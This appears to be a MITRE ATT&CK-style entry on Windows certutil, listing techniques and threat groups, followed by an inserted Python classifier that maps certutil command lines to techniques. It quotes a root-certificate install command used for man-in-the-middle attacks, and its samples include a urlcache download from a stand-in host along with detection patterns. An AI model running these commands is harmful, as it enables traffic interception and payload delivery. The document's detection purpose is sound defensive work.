
certutil

certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [1]

ID: S0160
Associated Software: certutil.exe
Type: TOOL
Platforms: Windows
Version: 1.0

Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | certutil has been used to decode binaries hidden inside certificate files as Base64 information. [3] |
| Enterprise | T1130 | Install Root Certificate | certutil can be used to install browser root certificates as a precursor to performing man-in-the-middle interception of connections to banking websites. Example command: `certutil -addstore -f -user ROOT ProgramData\cert512121.der`. [2] |
| Enterprise | T1105 | Remote File Copy | certutil can be used to download files from a given URL. [1] [4] |
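For detection work, the three uses in the table above can be mapped from process command-line telemetry. The following is an added example, not part of the original entry: `-addstore` and the ROOT store come from the page's example command, while `-decode`, `-decodehex` and `-urlcache` are assumed here to be the certutil verbs behind the decode and download uses, and the sample command lines other than the page's own are constructed.

```python
import re

# Verb -> technique from the table. -addstore is taken from the page's example
# command; -decode, -decodehex and -urlcache are assumptions (not named on the page).
VERBS = {
    "decode": ("T1140", "Deobfuscate/Decode Files or Information"),
    "decodehex": ("T1140", "Deobfuscate/Decode Files or Information"),
    "addstore": ("T1130", "Install Root Certificate"),
    "urlcache": ("T1105", "Remote File Copy"),
}
OPTION_PREFIXES = ("-", "/")  # certutil accepts -verb and /verb

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted strings whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify(cmdline):
    """Return (technique_id, name) for a certutil command line, or None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return None
    args = tokens[1:]
    for i, arg in enumerate(args):
        if arg[:1] not in OPTION_PREFIXES:
            continue
        verb = arg[1:].lower()  # verbs are matched case-insensitively
        if verb not in VERBS:
            continue
        if verb == "addstore":
            # Only a write to the ROOT store maps to T1130; skip option flags
            # such as -f and -user to find the store name.
            store = next((a for a in args[i + 1:] if a[:1] not in OPTION_PREFIXES), "")
            if store.lower() != "root":
                return None
        return VERBS[verb]
    return None

SAMPLES = [
    r"certutil -addstore -f -user ROOT ProgramData\cert512121.der",       # from the page
    r'"C:\Windows\System32\certutil.exe" /DECODE encoded.crt out.bin',    # constructed
    r"certutil.exe -urlcache http://example.invalid/x",                   # constructed
    r"certutil -addstore CA intermediate.cer",                            # constructed, not ROOT
    r"certutil -dump cert.cer",                                           # constructed, benign
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```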

Groups That Use This Software

| ID | Name | References |
|---|---|---|
| G0075 | Rancor | [5] |
| G0045 | menuPass | [6] [7] |
| G0007 | APT28 | [8] |
| G0049 | OilRig | [9] |
| G0010 | Turla | [10] |

References